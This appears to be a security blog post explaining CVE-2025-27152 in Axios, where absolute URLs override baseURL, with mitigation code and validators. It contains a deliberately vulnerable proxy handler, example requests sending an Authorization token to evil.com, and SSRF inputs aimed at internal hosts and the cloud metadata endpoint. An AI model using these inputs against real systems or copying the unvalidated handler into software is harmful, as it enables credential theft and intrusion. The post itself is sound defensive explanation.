CVE-2025-27152 - Critical SSRF and Credential Leakage in Axios via Absolute URL Handling
Axios is one of the most popular HTTP clients for JavaScript, widely used across both browser and Node.js environments. It’s often praised for its simplicity and promise-based workflow, making API calls easy and maintainable. However, the discovery of CVE-2025-27152 brings to light a critical security weakness, especially for developers who rely on Axios' baseURL configuration to keep their HTTP requests in check.
This long-read post breaks down the vulnerability, gives practical examples with code snippets, and details both its risks and how you can fix or mitigate the issue. All content herein is original and tailored to help you quickly grasp and address the security challenge.
What is CVE-2025-27152 About?
The vulnerability arises because, in Axios before 1.8.2, a request whose url is an absolute URL is always sent to that URL exactly as given, even when the instance has a baseURL configured, and there was no option to turn this off. Any code that passes untrusted input as the request path therefore lets the caller pick the destination host, which leads to Server-Side Request Forgery (SSRF) and, when the instance carries credentials, to credential leakage.
Why is it Dangerous?
- SSRF (Server-Side Request Forgery): Attackers could trick your backend into making requests to internal infrastructure, cloud metadata endpoints, or malicious external addresses.
- Credential Leakage: If your Axios requests automatically include cookies or HTTP authentication headers (via withCredentials or default options), those sensitive tokens could be sent to a hostile server.
How Axios URL Resolution Works
Axios lets you set a baseURL, and typically API calls are made with *relative paths* (like /users). Axios joins baseURL and the path to form the final URL. But if the path is an *absolute URL* (one starting with a scheme such as http:// or https://, or with a bare // for a protocol-relative URL), Axios uses it as-is and baseURL is ignored entirely.
Example
const axios = require('axios');

const api = axios.create({
  baseURL: 'https://api.example.com/',
  withCredentials: true, // Sends cookies on cross-origin requests (browser only)
});

// Safe usage: relative path is joined onto baseURL
api.get('/users'); // -> https://api.example.com/users

// DANGEROUS: absolute URL completely bypasses baseURL!
api.get('https://evil.com/steal'); // -> https://evil.com/steal
It’s easy to see how this could be exploited if the provided path isn't fully trusted or validated.
1. SSRF Example
Imagine you have a simple proxy endpoint designed to fetch user-supplied URLs:
// A typical proxy handler using Axios (DANGEROUS!)
const express = require('express');
const app = express();

app.get('/proxy', async (req, res) => {
  const path = req.query.url; // From user input, passed straight through
  try {
    const response = await api.get(path); // api has a baseURL, but an absolute url ignores it
    res.json(response.data);
  } catch (err) {
    res.status(500).send('Failed');
  }
});
Attack scenario: an attacker sends GET /proxy?url=http://internal.service.local/admin and your backend fetches that URL on their behalf, reaching services that are only routable from inside your network. On a cloud host the same request can be pointed at the instance metadata service (for example http://169.254.169.254/) to pull temporary credentials.
2. Credential Leakage Example
If your Axios instance sets default headers such as Authorization (or, in the browser, withCredentials: true), they are attached to every request the instance makes, including one to an absolute URL on a foreign host. Note that withCredentials only affects browser requests (XHR/fetch); Axios running in Node.js does not manage cookies on its own, so on the server the typical leak is a default Authorization header or API key.
const api = axios.create({
  baseURL: 'https://yourservice.com/',
  withCredentials: true,
  headers: { Authorization: 'Bearer supersecrettoken' },
});

// If the attacker controls the URL:
api.get('https://evil.com/steal');
// The Authorization header (and, in a browser, cookies) is sent to evil.com!
Fix: upgrade to Axios 1.8.2 or later and set allowAbsoluteUrls: false
Axios 1.8.2 addresses CVE-2025-27152 by adding an allowAbsoluteUrls request option. It defaults to true for backwards compatibility, so upgrading alone does not change how absolute URLs are handled: set allowAbsoluteUrls: false on the instance (or on the individual request) and an absolute URL in the request path is joined onto baseURL instead of replacing it. Treat the option as a guard on where requests can go, not as input validation; the path still needs checking.
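Added example (written for this post, not code from the Axios project): the helpers below re-implement the URL-resolution logic of Axios's isAbsoluteURL, combineURLs and buildFullPath utilities, including the allowAbsoluteUrls switch added in 1.8.2, so the behaviour described under "How Axios URL Resolution Works" and the effect of the upgrade can be seen without installing the library. The sample inputs and the resolveAll helper are constructed for illustration.

```javascript
// Added example: a stand-alone model of Axios URL resolution.
// These helpers re-implement the logic of Axios's isAbsoluteURL, combineURLs
// and buildFullPath utilities (as found in 1.8.x) so the behaviour can be
// seen offline; they are not the library itself.

// Axios calls a URL absolute when it starts with "scheme://" (any scheme,
// case-insensitive) OR with a bare "//" (protocol-relative).
function isAbsoluteURL(url) {
  return /^([a-z][a-z\d+\-.]*:)?\/\//i.test(url);
}

// Joins baseURL and a relative path, collapsing the slashes at the seam.
function combineURLs(baseURL, relativeURL) {
  return relativeURL
    ? baseURL.replace(/\/?\/$/, '') + '/' + relativeURL.replace(/^\/+/, '')
    : baseURL;
}

// allowAbsoluteUrls is the option added in 1.8.2. It defaults to true, which
// keeps the pre-1.8.2 behaviour (an absolute URL replaces baseURL entirely).
// With false, every request URL is joined to baseURL, absolute or not.
function buildFullPath(baseURL, requestedURL, allowAbsoluteUrls = true) {
  const isRelative = !isAbsoluteURL(requestedURL);
  if (baseURL && (isRelative || allowAbsoluteUrls === false)) {
    return combineURLs(baseURL, requestedURL);
  }
  return requestedURL;
}

// Constructed inputs: what a caller, or an attacker who controls the path,
// might hand to api.get().
const BASE = 'https://api.example.com/';
const SAMPLES = [
  '/users',                  // ordinary relative path
  'users?id=7',              // relative without a leading slash
  'https://evil.com/steal',  // absolute: escapes baseURL before 1.8.2
  '//evil.com/steal',        // protocol-relative: ALSO absolute to Axios
  'FTP://evil.com/x',        // any scheme followed by "//" counts
  'https:evil.com',          // no "//": not absolute, joined to baseURL
];

// For each input: whether it escapes baseURL, where the request goes with
// the default setting, and where it goes with allowAbsoluteUrls: false.
function resolveAll(baseURL = BASE, inputs = SAMPLES) {
  return inputs.map((input) => ({
    input,
    escapesBase: isAbsoluteURL(input),
    defaultSetting: buildFullPath(baseURL, input, true),
    hardened: buildFullPath(baseURL, input, false),
  }));
}

console.table(resolveAll());
```

Two things worth noticing in the table: the protocol-relative and FTP forms count as absolute just like https://evil.com, so a check that only looks for "http://" and "https://" is narrower than what Axios itself treats as absolute; and with allowAbsoluteUrls: false an absolute input becomes a harmless path segment under baseURL rather than a request to another host.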
If you cannot upgrade immediately (or want validation in addition to the option), here is a defensive wrapper:
function safeAxiosGet(apiInstance, path) {
  // Only allow relative paths. Axios treats "scheme://..." (any scheme, any
  // case) and protocol-relative "//..." as absolute, so reject exactly the
  // pattern Axios itself uses rather than just http:// and https://.
  if (typeof path !== 'string' || /^([a-z][a-z\d+\-.]*:)?\/\//i.test(path)) {
    throw new Error('Absolute URLs are not allowed!');
  }
  return apiInstance.get(path);
}

// Usage inside the request handler
app.get('/proxy', async (req, res) => {
  try {
    const response = await safeAxiosGet(api, req.query.url);
    res.json(response.data);
  } catch (e) {
    res.status(400).send('Bad request.');
  }
});
Best Practice: Always validate and sanitize user input, and restrict outgoing requests to trusted domains—especially when proxies or backends act as “requestors” on behalf of users.
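Added example of the allow-list approach just described (not code from the Axios project; validateRequestPath, safeGet, checkAll and the sample inputs are assumptions made for this post). Rather than deny-listing http:// and https://, it resolves the user-supplied path against the instance's baseURL with the WHATWG URL parser and accepts only results that stay on the same origin and under an allowed path prefix, failing closed on everything else.

```javascript
// Added example: allow-list validation of a user-supplied request path.
// Not part of Axios; helper names are assumptions made for this post.

// Same test Axios applies: "scheme://" (any scheme, case-insensitive) or "//".
const AXIOS_ABSOLUTE_RE = /^([a-z][a-z\d+\-.]*:)?\/\//i;

// Returns { ok: true, path } with a normalised "/path?query" string to hand to
// the Axios instance, or { ok: false, reason } saying why it was rejected.
function validateRequestPath(baseURL, input, { allowedPrefix = '/' } = {}) {
  if (typeof input !== 'string' || input.length === 0) {
    return { ok: false, reason: 'empty' };
  }
  // Anything Axios would treat as absolute escapes baseURL: reject outright.
  if (AXIOS_ABSOLUTE_RE.test(input)) {
    return { ok: false, reason: 'absolute-url' };
  }
  // Control characters and whitespace are never legitimate in a path and may
  // be interpreted differently by the URL parser and the HTTP client.
  if (/[\s\u0000-\u001f\u007f]/.test(input)) {
    return { ok: false, reason: 'control-chars' };
  }
  let base;
  let resolved;
  try {
    base = new URL(baseURL);
    resolved = new URL(input, base); // WHATWG resolution, as a browser would do it
  } catch {
    return { ok: false, reason: 'unparseable' };
  }
  // Fail closed on anything the URL parser sends elsewhere, even if Axios's
  // own regex would not have called it absolute (e.g. backslash forms).
  if (resolved.origin !== base.origin) {
    return { ok: false, reason: 'origin-mismatch' };
  }
  // pathname is already dot-segment-normalised, so "/users/../admin" is
  // checked as "/admin" and cannot sneak past the prefix check.
  if (!resolved.pathname.startsWith(allowedPrefix)) {
    return { ok: false, reason: 'path-escape' };
  }
  return { ok: true, path: resolved.pathname + resolved.search };
}

// Drop-in replacement for api.get(userInput): validates against the
// instance's own defaults.baseURL and throws on rejection.
async function safeGet(apiInstance, input, options) {
  const verdict = validateRequestPath(apiInstance.defaults.baseURL, input, options);
  if (!verdict.ok) {
    throw new Error(`Rejected request path (${verdict.reason})`);
  }
  return apiInstance.get(verdict.path);
}

// Constructed inputs covering normal use and the escape attempts from this post.
const BASE = 'https://api.example.com/';
const SAMPLES = [
  '/users',
  '/users?id=7',
  'https://evil.com/steal',
  '//evil.com/steal',
  'FTP://evil.com/x',
  '\\\\evil.com/x',          // backslashes: the URL parser reads this as //evil.com/x
  'https:evil.com',          // no "//": joined to baseURL, harmless
  'users\r\nX-Injected: 1',  // header-injection style input
];

// Verdict for every sample, for a quick look at what gets through.
function checkAll(baseURL = BASE, inputs = SAMPLES) {
  return inputs.map((input) => ({ input, ...validateRequestPath(baseURL, input) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(checkAll());
}
```

The origin comparison deliberately rejects inputs such as \\evil.com/x that Axios's own regex would not have called absolute: Axios would join them onto baseURL, but a browser-style parser reads them as a different host, and a guard that fails closed on disagreement between the two parsers is cheaper than reasoning about every such case. Pass allowedPrefix when the proxy should only reach a sub-tree of the API, and keep in mind that the returned path is what you hand to the Axios instance, not the raw input.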
Further Reading
- Original Axios Issue #5377
- Axios Security Advisories
- Node.js: Dangers of SSRF
- Credential Leakage Risks
Conclusion
CVE-2025-27152 is a classic example of how a small convenience feature can have an outsized security impact. If you rely on Axios, especially in a Node.js backend, upgrade to 1.8.2 or later, set allowAbsoluteUrls: false, and review every place where user input can influence a request path. Don't trust client-provided URLs, avoid passing absolute URLs to Axios, and always validate user input!
Timeline
Published on: 03/07/2025 16:15:38 UTC
Last modified on: 03/07/2025 20:15:38 UTC